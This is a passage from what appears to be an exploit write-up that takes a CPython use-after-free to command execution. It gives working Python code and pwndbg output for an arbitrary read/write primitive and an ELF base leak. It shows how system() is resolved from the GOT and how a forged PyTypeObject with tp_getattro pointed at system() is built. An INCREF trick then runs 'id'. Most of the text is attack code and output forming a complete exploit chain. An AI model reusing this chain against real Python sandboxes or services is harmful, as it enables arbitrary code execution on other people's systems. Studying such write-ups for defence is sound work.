──────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────
► 0x7ffff7c4553b <kill+11> cmp rax, -0xfff
0x7ffff7c45543 <kill+19> ret
↓
0x6a8ba2 <os_kill_impl+52> cmp eax, -1
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
► 0 0x7ffff7c4553b kill+11
1 0x6a8ba2 os_kill_impl+52
2 0x6a8c0f os_kill+64
3 0x4ff074 cfunction_vectorcall_FASTCALL+103
4 0x5aa892 _PyEval_EvalFrameDefault+56003
Step 2: Arbitrary read/write primitive
Once the window is open, implementing r64 / w64 is straightforward:
r64 = lambda addr: int.from_bytes(bytes(mem[addr + i] for i in range(8)), 'little')
w64 = lambda addr, val: [mem.__setitem__(addr + i, (val >> 8*i) & 0xff) for i in range(8)]
read = lambda addr, sz: bytes(mem[addr + i] for i in range(sz))
mem[addr] calls bytearray_subscript, which at the C layer reduces to *(buffer pointer + addr) = *(0 + addr) = *(addr). The write path mem.__setitem__(addr, byte) goes through bytearray_ass_subscript and likewise writes directly to address addr.
Self-consistency check (canary round-trip)
Canary write test in pwndbg:
[Stage 2] Arb R/W self-consistency
================================================================
target: canary_holder @ 0x7ffff74e3ec0
r64(0x7ffff74e3ec0) BEFORE write = 0x0000000000000001
ctypes direct BEFORE write = 0x0000000000000001
w64(0x7ffff74e3ec0, 0xdeadbeefcafebabe)
r64(0x7ffff74e3ec0) AFTER write = 0xdeadbeefcafebabe
ctypes direct AFTER write = 0xdeadbeefcafebabe
[PASS] read-back == 0xdeadbeefcafebabe
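Both paths (r64 through the mem window vs. ctypes direct mapping) read the same value, so the primitive is verified.
Step 3: Leak the ELF base address
Using the tp_dealloc pointer
id(int) returns the address of PyLong_Type in the static data segment. Within the PyTypeObject structure, tp_dealloc (the destructor pointer) sits at +0x30: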
PyTypeObject offset layout:
+0x00 ob_refcnt
+0x08 ob_type
+0x10 ob_size
+0x18 tp_name (char*)
+0x20 tp_basicsize
+0x28 tp_itemsize
+0x30 tp_dealloc ← points to a function inside the python3 binary
+0x38 tp_vectorcall_offset
...
+0x90 tp_getattro ← later hijack target
r64(id(int) + 0x30) reads PyLong_Type.tp_dealloc, a function pointer into the python3 ELF image. Page-align it (>> 12 << 12), then scan one page at a time toward lower addresses until the \x7fELF magic is found; that is the ELF header.
leak = (r64(id(int) + 0x30) >> 12) << 12
while read(leak, 4) != b"\x7fELF":
    leak -= 0x1000
elf_base = leak
pwndbg:
[Stage 3] ELF base leak
================================================================
id(int) = PyLong_Type @ 0x9a0a20
r64(PyLong_Type + 0x30) = 0x4e1d11 (tp_dealloc)
page-aligned = 0x4e1000
ELF header @ 0x400000
magic = b'\x7fELF'
e_type = 0x0002 (2=ET_EXEC, 3=ET_DYN)
e_machine = 0x003e (62=EM_X86_64)
e_entry = 0x422066
e_phoff = 0x40 (14 entries × 56 bytes)
Step 4: Parse system() from .dynamic
The ELF header points to the program header table. Walk the PHDRs to find the entry of type PT_DYNAMIC (2); its p_vaddr points to the .dynamic section.
.dynamic contains a series of {d_tag, d_val} pairs (8 bytes per field), terminated by d_tag == 0 (DT_NULL). We need four tags:
| Tag | Value | Meaning |
|---|---|---|
| DT_JMPREL (23) | d_val | Start address of rela.plt (relocation table for imported functions) |
| DT_PLTRELSZ (2) | d_val | Total size of rela.plt in bytes |
| DT_SYMTAB (6) | d_val | Address of .dynsym (symbol table) |
| DT_STRTAB (5) | d_val | Address of .dynstr (symbol name string table) |
Each Elf64_Rela entry occupies 24 bytes:
+0 r_offset (8) → address of the corresponding GOT slot
+8 r_info (8) → upper 32 bits: symbol table index; lower 32 bits: relocation type
+16 r_addend (8)
Take the symbol name offset from .dynsym[sym_idx].st_name, then read the string from .dynstr. Once "system" is found, reading the value in the GOT yields the runtime address of system() (provided lazy resolution has already completed).
for i in range(dt_pltrelsz // 24):
    rela = dt_jmprel + i * 24
    r_offset = r64(rela) # GOT slot address
    r_info = r64(rela + 8)
    sym_idx = r_info >> 32
    st_name = r32(dt_symtab + sym_idx * 24)
    name = read(dt_strtab + st_name, 32).split(b"\x00")[0]
    if name == b"system":
        system = r64(r_offset) # dereference GOT → real system() address
        break
pwndbg:
[Stage 4] Resolving system() via .dynamic
================================================================
PT_DYNAMIC: phdr[6] p_vaddr=0xa8add8 filesz=0x200
.dynamic resolved @ 0xa8add8
DT_JMPREL (rela.plt) = 0x41c8d8 (501 entries)
DT_SYMTAB = 0x403818
DT_STRTAB = 0x410f28
Found 'system' in rela.plt[106]:
r_offset (GOT entry addr) = 0xa8b350
sym_idx = 106
GOT[r_offset] (resolved addr)= 0x7ffff7c58750
first 8 bytes of system() = f30f1efa4885ff74
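The leading bytes f3 0f 1e fa encode endbr64, the first instruction of libc's system() (CET-enabled build). 0x7ffff7c58750 is a real libc address rather than a PLT stub, which shows the symbol has already been resolved.
Step 5: Forge PyTypeObject
What is tp_getattro?
When Python executes obj.attr, the interpreter takes this path:
LOAD_ATTR bytecode
→ _PyObject_GetMethod(obj, "attr")
→ PyObject_GetAttr(obj, name)
→ f = Py_TYPE(obj)->tp_getattro ← read the function pointer from ob_type
→ f(obj, name) ← indirect call
tp_getattro is at offset +0x90 in PyTypeObject (the 24 bytes of PyObject_VAR_HEAD, followed by the slots in declaration order). It is a getattrofunc pointer with the prototype:
typedef PyObject *(*getattrofunc)(PyObject *obj, PyObject *name);
If this pointer is replaced with system, the interpreter calls system(obj, name) on attribute access. Under the System V AMD64 calling convention the first argument is passed in RDI, and system(const char *command) only reads RDI, so the net effect is system(obj): it executes the string at the address of obj.
Constructing fake_type
fake_type = flat(
0x1000, # +0x00 ob_refcnt (high value to keep GC away)
id(type(int)), # +0x08 ob_type (metaclass, keeps the object "valid")
b"\x00" * 0x28, # +0x10 ~ +0x37 padding (covers ob_size / tp_name /
# tp_basicsize / tp_itemsize / tp_dealloc)
system, # +0x38 start filling with system()
) + p64(system) * 52 # 52 more copies: 53 in total, ending at +0x38 + 53*8 = +0x1E0
# overwrite tp_getattro(+0x90) and all other slots
Keep these bytes in a bytes object so they stay alive, then compute fake_type_addr = id(bytes(fake_type)) + 32 (skipping the 32-byte PyBytesObject header to reach the content area).
pwndbg memory verification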
[Stage 5] Fake PyTypeObject
================================================================
fake_type_bytes (PyBytesObject) @ 0xd8be40
content area (our fake type) @ 0xd8be60
int metaclass @ 0xaa6b60
Slot inspection (first 20 qwords from fake_type_addr):
+0x00: 0x0000000000001000 ← ob_refcnt
+0x08: 0x0000000000aa6b60 ← ob_type (metaclass)
+0x10: 0x0000000000000000
+0x18: 0x0000000000000000
+0x20: 0x0000000000000000
+0x28: 0x0000000000000000
+0x30: 0x0000000000000000
+0x38: 0x00007ffff7c58750 ← tp_vectorcall_offset (also system)
+0x40: 0x00007ffff7c58750 ← system() [+0x40]
+0x90: 0x00007ffff7c58750 ← tp_getattro *** system() ***
pwndbg's x/20gx fake_type_addr confirms:
(gdb) x/20gx 0xd8be60
0xd8be60: 0x0000000000001000 0x0000000000aa6b60
0xd8be70: 0x0000000000000000 0x0000000000000000
0xd8be80: 0x0000000000000000 0x0000000000000000
0xd8be90: 0x0000000000000000 0x00007ffff7c58750
0xd8bea0: 0x00007ffff7c58750 0x00007ffff7c58750
0xd8bef0: 0x00007ffff7c58750 0x00007ffff7c58750
0xd8bef0 = 0xd8be60 + 0x90 is the tp_getattro slot, and it indeed holds 0x7ffff7c58750 = system().
Step 6: INCREF trick + fake_obj + RCE
Question: where does the argument for system() come from?
When tp_getattro(obj, name) is called, obj is in RDI. system(const char *command) takes RDI as the command string pointer, so system() executes the string at the address of obj.
We need obj (fake_obj_addr) to point to a Python object containing a shell command, and the start of that object at the C layer, namely the 8 bytes of the ob_refcnt field, must be "id\x00..." (or another command).
The ingenuity of the INCREF trick
Storing "id\x00..." directly as ob_refcnt runs into a problem: Python's BINARY_SUBSCR (list index access) executes Py_INCREF(item) before returning the element, adding 1 to ob_refcnt.
Use this behavior: store the command with its first byte decremented by 1. The ASCII code of 'i' is 105; minus 1 gives 104 = 'h'. After INCREF, 'h' → 'i' and the command is correct.
cmd = bytes([ord('i') - 1]) + b"d\x00\x00\x00\x00\x00\x00" # b"hd\x00..."
fake_obj = cmd + p64(fake_type_addr) + b"\x00" * 0x100
# [0..7] ob_refcnt = b"hd\x00..." ← becomes b"id\x00..." after Py_INCREF
# [8..15] ob_type = fake_type_addr
# [16..] padding
Overwriting the ob_item pointer
Internal structure of list objects:
PyListObject:
+0x00 ob_refcnt
+0x08 ob_type
+0x10 ob_size (len(list))
+0x18 ob_item (PyObject **, points to the payload array)
+0x20 allocated
payload = [None]
w64(r64(id(payload) + 0x18), fake_obj_addr) # overwrite ob_item[0]
pwndbg stops at break PyObject_GetAttr (the call triggered by payload[0].pwned):
─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
*RDI 0x7ffff74acae0 ◂— 0x6469 /* 'id' */ ← fake_obj, already 'id' after INCREF
*RSI 0x7ffff7505990 ◂— 0xffffffff ← PyUnicode "pwned"
RIP 0x504607 (PyObject_GetAttr) ◂— endbr64
Execution result:
uid=1000(ivan) gid=1000(ivan) groups=1000(ivan),27(sudo)
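Wrap-up: Complete exploit flow review
From UAF trigger to command execution there is no shellcode and no ROP; the whole chain uses the interpreter's own C function pointer dispatch:
- fake_ba heap spray sets a bytearray's buffer pointer to NULL and ob_size to MAX → memory window opened
- r64/w64 implement arbitrary address read/write through bytearray index access
- ELF base is derived backward from the PyLong_Type.tp_dealloc pointer
- system() is resolved at runtime via the ELF's PT_DYNAMIC → rela.plt
- fake PyTypeObject fills tp_getattro with system()
- ob_item overwrite makes payload[0] point to a forged Python object whose ob_refcnt holds the command string
- INCREF trick uses the automatic INCREF in Python's BINARY_SUBSCR to turn the command's first byte from 'h' (0x68) into 'i' (0x69)
- payload[0].pwned goes through PyObject_GetAttr → tp_getattro(obj) → system("id")
(End)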